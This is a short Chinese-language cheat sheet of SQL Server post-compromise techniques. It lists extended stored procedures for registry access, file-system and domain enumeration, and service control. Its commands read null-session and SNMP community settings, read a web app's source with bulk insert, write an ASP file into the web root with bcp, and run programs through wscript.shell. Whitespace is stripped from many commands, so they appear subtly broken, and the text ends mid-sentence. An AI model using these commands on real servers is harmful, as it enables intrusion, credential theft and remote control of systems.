一些sql擴展
xp_regaddmultistring
xp_regdeletekey刪除鍵名
xp_regdeletevalue刪除鍵值
xp_regenumkeys枚舉
xp_regenumvalues
xp_regread對於
xp_regremovemultistring
xp_regwrite寫
xp_availablemedia查看驅動器
xp_dirtree看目錄
xp_enumdsnODBC數據源
xp_loginconfig一些服務器安全配置的信息
xp_makecab打包,某些dbo權限先可做大用
xp_ntsec_enumdomains枚舉域名相關信息
xp_terminate_process終端進程和ip啦
xp_logininfo當前登錄帳號
sp_configure檢索數據庫中的內容(我覺得這個挺有用的)
sp_helpextendedproc得到所有的存儲擴展
sp_who2查詢用戶,他們登錄的主機,他們在數據庫中執行的操作等等
一些網絡信息
execxp_regreadHKEY_LOCAL_MACHINE,
'SYSTEM/CurrentControlSet/Services/lanmanserver/parameters',
'nullsessionshares'
SNMP輔助網絡踩點
execxp_regenumvaluesHKEY_LOCAL_MACHINE,
'SYSTEM/CurrentControlSet/Services/snmp/parameters/validcomm
unities'
開始一些系統服務,比如telnet,前提希望可以跑來admin或者一些系統密碼
execmaster..xp_servicecontrol'start','schedule'
execmaster..xp_servicecontrol'start','server'
Sp_addextendedproc'xp_webserver','c:/temp/xp_foo.dll'此擴展可以運行程序
使用'bulkinsert'語法可以將一個文本文件插入到一個臨時表中。簡單地創建這個表:
createtablefoo(linevarchar(8000))
然後執行bulkinsert操作把文件中的數據插入到表中,如:
bulkinsertfoofrom'c:/inetpub/wwwroot/admin/inc.asp'
bcp"select*fromtext..foo"queryoutc:/inetpub/wwwroot/runcommand.asp–c-Slocalhost–Usa–Pfoobar
'S'參數為執行查詢的服務器,'U'參數為用戶名,'P'參數為密碼,這里為'foobar'
SQLSERVER中提供了幾個內置的允許創建ActiveX自動執行腳本的存儲過程。這些腳本和運行在windows腳本解釋器下的腳本,或者ASP腳本程序一樣——他們使用VBScript或JavaScript書寫,他們創建自動執行對象並和它們交互。一個自動執行腳本使用這種方法書寫可以在Transact-SQL中做任何在ASP腳本中,或者WSH腳本中可以做的任何事情
使用'wscript.shell'對象建立了一個記事本的實例:
declare@oint
execsp_oacreate'wscript.shell',@oout
execsp_oamethod@o,'run',NULL,'notepad.exe'
指定在用戶名後面來執行它: